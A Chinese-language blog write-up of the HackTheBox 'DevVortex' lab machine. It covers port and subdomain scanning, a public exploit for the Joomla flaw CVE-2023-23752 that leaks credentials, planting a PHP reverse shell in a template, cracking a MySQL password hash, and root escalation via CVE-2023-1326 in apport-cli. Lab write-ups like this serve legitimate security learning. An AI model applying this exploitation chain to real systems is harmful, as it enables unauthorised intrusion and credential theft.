DevVortex Write Up on HackTheBox

,

Before all

第一次打HTB,我發現跟THM比起來它的題目難度/複雜性和真實性都是更高的,不過THM可以學到的東西感覺比較廣,所以之後應該兩個都打!
此外,我想了想決定之後Write Up都用中文寫,畢竟英文的其實國外很多都有,就用來造福一些台灣跟我一樣的新手吧= =(如果有人看到XD)

Attacker’s IP : 10.10.14.46
Victim’s IP : 10.10.11.242
Victim’s Host : devvortex.htb

p.s.HTB的網路環境比THM還穩很多 = =

Write up

RECON

port scan

command: 

1
rustscan -a 10.10.11.242 --ulimit 5000 -- -sC -sV -Pn

result:
image

很正常地開了 port 22的ssh和port 80的web服務

subdomain enumeration

command: 

1
wfuzz -c -w ~/wordlist/subdomains.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb"

image

因為彈出來都是 7 lines,重新改一下指令: 

1
wfuzz -c -w ~/wordlist/subdomains.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb"  --hl 7

result:
image

找到子網域dev.devvortex.htb

directory enumeration

command: 

1
dirsearch --url http://dev.devvortex.htb/

result:
image

註:也有去打過devvortex.htb,不過沒有什麼有用的資訊。

Exploit

CVE-2023-23752 to RCE

查看 README.txt,發現這是一個JoomlaCMS 4.x 的版本,查詢expliot-db找到這個漏洞。
image

使用的PoC:https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT/blob/main/CVE-2023-23752.py

command: 

1
python3 CVE-2023-23752.py -u http://dev.devvortex.htb

result:
image
找到一組使用者帳號密碼:lewis:P4ntherg0t1n5r3c0n##

進到管理頁面後到System->Templates編輯error.php,塞入php reverse shell(打靶機我習慣使用Pentest Monkey的版本)

image

image

成功在本地端口1004get shell!

image

Previlige Escalation

mysql

先以剛剛獲得的密碼登入mysql
command: 

1
mysql -u lewis -p joomla

image

從使用者表獲取密碼hash值

image

logan密碼hash值:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

password cracking

將前一步的密碼hash值存到pass裡面後以john搭配rockyou.txt進行字典攻擊:
image
登入成功,取得user.txt
image

CVE-2023-1326

經由sudo -l的指令檢查特殊權限:
image
發現能以root執行/usr/bin/apport-cli
上網查詢資料發現CVE-2023-1326的漏洞。
link:https://vk9-sec.com/cve-2023-1326privilege-escalation-apport-cli-2-26-0/
照著做即可拿到 root shell
image

After all

這是補昨天的,今天可能還要寫兩篇(倒)